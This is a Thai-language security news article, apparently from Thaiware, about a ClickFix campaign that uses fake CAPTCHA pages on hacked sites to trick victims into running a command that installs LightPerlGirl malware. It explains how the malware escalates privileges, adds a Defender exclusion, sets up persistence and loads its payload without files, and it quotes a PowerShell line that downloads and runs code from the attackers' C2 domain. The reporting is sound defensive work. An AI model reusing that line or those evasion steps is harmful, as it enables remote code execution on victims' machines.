โปรดอัพเดตเบราว์เซอร์

เบราว์เซอร์ที่คุณใช้เป็นเวอร์ชันเก่าซึ่งไม่สามารถใช้บริการของเราได้ เราขอแนะนำให้อัพเดตเบราว์เซอร์เพื่อการใช้งานที่ดีที่สุด

ไอที

วิธีหลอกลวงแห่งปี !? ClickFix ฮิตไม่เลิก รอบนี้ปล่อยมัลแวร์ LightPerlGirl ฝังลงเครื่องเหยื่อ

Thaiware

อัพเดต 13 ชั่วโมงที่ผ่านมา • เผยแพร่ 13 ชั่วโมงที่ผ่านมา • Sarun_ss777
แฮกเกอร์ใช้การแฮกเว็บทั่วไปแต่แทรกหน้าจอ Captcha ปลอมหลอกทำตามคำสั่งเพื่อติดตั้งมัลแวร์ดังกล่าวลงเครื่อง

การหลอกล่อให้เหยื่อทำการติดตั้งมัลแวร์ลงเครื่องนั้น เรียกได้ว่ามีหลากหลายวิธี โดยวิธีหนึ่งที่กำลังมาแรงในปัจจุบันคือ การใช้คำสั่งบนหน้าจอเพจปลอมหลอกให้เยอะต้องทำตามขั้นตอนเพื่อแก้ปัญหาที่เกิดขึ้น แท้จริงแล้วเป็นการติดตั้งมัลแวร์ โดยวิธีการดังกล่าวนั้นเรียกว่า ClickFix และข่าวนี้ก็เป็นอีกหนึ่งข่าวที่มีการแพร่กระจายมัลแวร์ด้วยวิธีการดังกล่าว

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญ ClickFix ตัวใหม่ เพื่อใช้ในการแพร่กระจายมัลแวร์ที่มีชื่อว่า LightPerlGirl โดยแคมเปญนี้จะเป็นการที่เหยื่อเข้าสู่เว็บไซต์ปกติทั่วไปที่ถูกแฮกเกอร์ทำการเข้ายึดครองปรับเปลี่ยนสคริปท์ภายในด้วยการสอดแทรกโค้ดในรูปแบบ JavaScript ที่หลังจากที่สคริปท์ทำงานแล้ว จะเป็นการแสดง Captcha ปลอมซึ่งมีการสั่งให้เหยื่อทำตามที่ตัว Captcha สั่งให้ทำโดยอ้างว่าเป็นการทำเพื่อยืนยันตัวตนผู้ใช้งาน โดยตัว Captcha นั้นจะสั่งให้เหยื่อทำการกดปุ่มโลโก้ Windows และปุ่ม R เพื่อเปิดฟีเจอร์รันขึ้นมา ซึ่งในระหว่างนี้ตัวสคริปท์จะทำการคัดลอกโค้ดสำหรับการรันและดาวน์โหลดมัลแวร์ไว้เป็นที่เรียบร้อยแล้ว ดังนั้น สคริปท์ในขั้นถัดไปจะเป็นการสั่งให้เหยื่อทำการกดปุ่ม CTRL+V เพื่อวางตัวโค้ดลงบน Run และกด Enter เพื่อให้ตัวระบบนำไปสู่การดาวน์โหลด และรันติดตั้งมัลแวร์ดังกล่าวลงสู่เครื่อง

วิธีหลอกลวงแห่งปี !? ClickFix ฮิตไม่เลิก รอบนี้ปล่อยมัลแวร์ LightPerlGirl ฝังลงเครื่องเหยื่อ


ภาพจาก: https://cybersecuritynews.com/beware-of-fake-captcha-that-installs-lightperlgirl-malware/

สำหรับตัวมัลแวร์ LightPerlGirl นั้นเป็นมัลแวร์ที่มาในรูปแบบของการติดตั้งแบบหลากขั้นหลายขั้นตอน (Multi-Stage Infection) โดยตัวชุดคำสั่ง PowerShell ตัวแรกที่ถูกรันขึ้นในขั้นตอน ClickFix นั้น จะเต็มไปด้วยโค้ดสำหรับการตีรวนระบบเพื่อให้ระบบป้องกันไม่สามารถจับได้ (Obfuscation) ซึ่งเมื่อมีการทำความสะอาดตัวโค้ดระหว่างการวิเคราะห์โดยทีมวิจัยออกไป ก็ได้พบว่าโค้ดดังกล่าวนั้นมีไว้เพื่อการติดต่อสื่อสารกับตัวเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ซึ่งถูกตั้งอยู่ที่ URL (cmbkz8kz1000108k2carjewzf[.]info) โดยตัวโค้ดนั้นจะมีลักษณะดังนี้

$rbld30 = 'cmbkz8kz1000108k2carjewzf.info';

$vnrl01 = Invoke-RestMethod -Uri $rbld30;

Invoke-Expression $vnrl01

หลังจากที่ตัวมัลแวร์ทำการติดต่อกับเซิร์ฟเวอร์เป็นที่เรียบร้อยแล้ว ก็จะทำการดาวน์โหลด JavaScript ตัวที่สองลงมารันบนเครื่อง โดยตัวสคริปท์นั้นจะมีองค์กรประกอบสำคัญ 3 อย่างคือ HelpIO, Urex, และ ExWpL ซึ่งแต่ละตัวนั้นจะทำหน้าที่ต่างกันดังนี้

  • HelpIO จะเป็นตัวจัดการกระบวนการทั้งหมด (Orchestrator) โดยเครื่องมือตัวนี้จะทำการเข้าอัปเกรดสิทธิ์การใช้งานขึ้นเป็นระดับผู้ดูแล (Admin หรือ Administrator) ผ่านทาง User Account Control นอกจากนั้นแล้วตัวเครื่องมือยังมีการเพิ่มรายชื่อของโฟลเดอร์ที่ตัวมัลแวร์ใช้งาน (C:WindowsTemp) ลงไปยังรายชื่อยกเว้น (Exclusion List) ของตัว Windows Defender อีกด้วย
  • Urex จะเริ่มทำงานหลังจากที่สิทธิ์ในการเข้าถึงได้ถึงระดับ Admin แล้ว โดยตัวเครื่องมือจะทำการสร้างความคงทนของตัวมัลแวร์ในระบบ (Persistence) เพื่อให้มั่นใจว่าตัวมัลแวร์จะสามารถรันในระบบได้ตลอดเวลา ด้วยการดาวน์โหลดไฟล์ Batch ลงมาจากเซิร์ฟเวอร์ C2 แล้วทำการวางไฟล์ที่ดาวน์โหลดมาภายใต้ชื่อ LixPay.bat ลงไปยังโฟลเดอร์ที่ถูกยกเว้นจากการตรวจสอบตามขั้นตอนที่ผ่านมา
  • ExWpL จะทำงานต่อ ด้วยการทำหน้าที่ดาวน์โหลดมัลแวร์ตัวจริง (Payload) ลงมาติดตั้งบนเครื่องของเหยื่อในแบบการติดตั้งแบบไร้ไฟล์ (Fileless) ผ่านทาง .NET Reflection ซึ่งจะเป็นการดาวน์โหลดชุดโค้ดที่ถูกเข้ารหัสในรูปแบบ Base-64 .Net Assembly ลงมาบนหน่วยความจำโดยตรงโดยไม่ต้องทำการบันทึกลงบนไดร์ฟ ซึ่งจะทำให้การตรวจสอบมัลแวร์แบบดั้งเดิมที่เน้นการตรวจสอบไฟล์ทำได้ยาก ทำให้การติดตั้งมัลแวร์ลงสู่เครื่องนั้นค่อนข้างไร้ร่องรอยในการตรวจสอบ

ทั้งนี้ ทางแหล่งข่าวไม่ได้ให้ข้อมูลไว้ว่า ตัวมัลแวร์ดังกล่าวนี้เป็นมัลแวร์ประเภทใด และจะส่งผลต่อเครื่องที่ถูกฝังลงอย่างไร

➤ Website : https://www.thaiware.com
➤ Facebook : https://www.facebook.com/thaiware
➤ Twitter : https://www.twitter.com/thaiware
➤ YouTube : https://www.youtube.com/thaiwaretv

ดูข่าวต้นฉบับ
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...

ล่าสุดจาก Thaiware

นักทดสอบพบ Windows 11 ตัว Beta รุ่นล่าสุด ถูกสลับเสียง Startup ตอนบูทเครื่องเป็นของ Vista แทน

9 ชั่วโมงที่ผ่านมา

อัปเดตฉุกเฉิน Windows 11 ประจำเดือนมิถุนายน แก้บั๊กเก่า แต่! ได้บั๊กใหม่มาเพียบ

1 วันที่แล้ว

วิดีโอแนะนำ

ข่าวและบทความไอทีอื่น ๆ

กองทัพอากาศไทยพัฒนาโดรนพลีชีพ (Kamikaze UAV) สำเร็จสามารถโจมตีเป้าหมายอย่างแม่นยำ

TNN ช่อง16

เจ็ตแพ็กใต้น้ำ XiaoTun ราคาย่อมเยา ทางเลือกใหม่สำหรับนักดำน้ำทั่วไป

TNN ช่อง16

ทะเลทรายอาตากามาทำ ALMA หยุดทำงาน ชี้สัญญาณผลกระทบจากสภาพอากาศสุดขั้ว

TNN ช่อง16

นักบินอวกาศนิโคล เอเยอร์ส บันทึกภาพสไปรต์สีแดงเหนืออเมริกาเหนือ

TNN ช่อง16

Donald Trump เตรียมคุยกับจีนเรื่องดีลซื้อ TikTok สัปดาห์หน้า

BT Beartai

ผู้บริการ Xbox Game Studios แนะนำพนักงานที่ถูกเลิกจ้างลองปรึกษา AI ดู

BT Beartai

Huawei และ Apple 'เติบโตขึ้น' ในตลาดสมาร์ตโฟนจีนที่ 'เงียบเหงา' ช่วงไตรมาสที่ 2 ปี 2025

BT Beartai

ย่อยสลายได้ ใช้เชื้อรากินพลาสติก เปลี่ยนผ้าอ้อมเป็นดิน

Techhub

ข่าวและบทความยอดนิยม

อัปเดตฉุกเฉิน Windows 11 ประจำเดือนมิถุนายน แก้บั๊กเก่า แต่! ได้บั๊กใหม่มาเพียบ

Thaiware

ตรวจพบช่องโหว่ Zero-Day บน Chrome เปิดช่องให้แฮกเกอร์ฝัง Backdoor ลงระบบ

Thaiware

เอาอีกแล้ว ! นักวิจัยพบรหัสผ่านกว่า 16,000 ล้านชุด หลุดอยู่ในแหล่งสาธารณะคาดต้นสายมาจากมัลแวร์ขโมยข้อมูล

Thaiware
ดูเพิ่ม
Loading...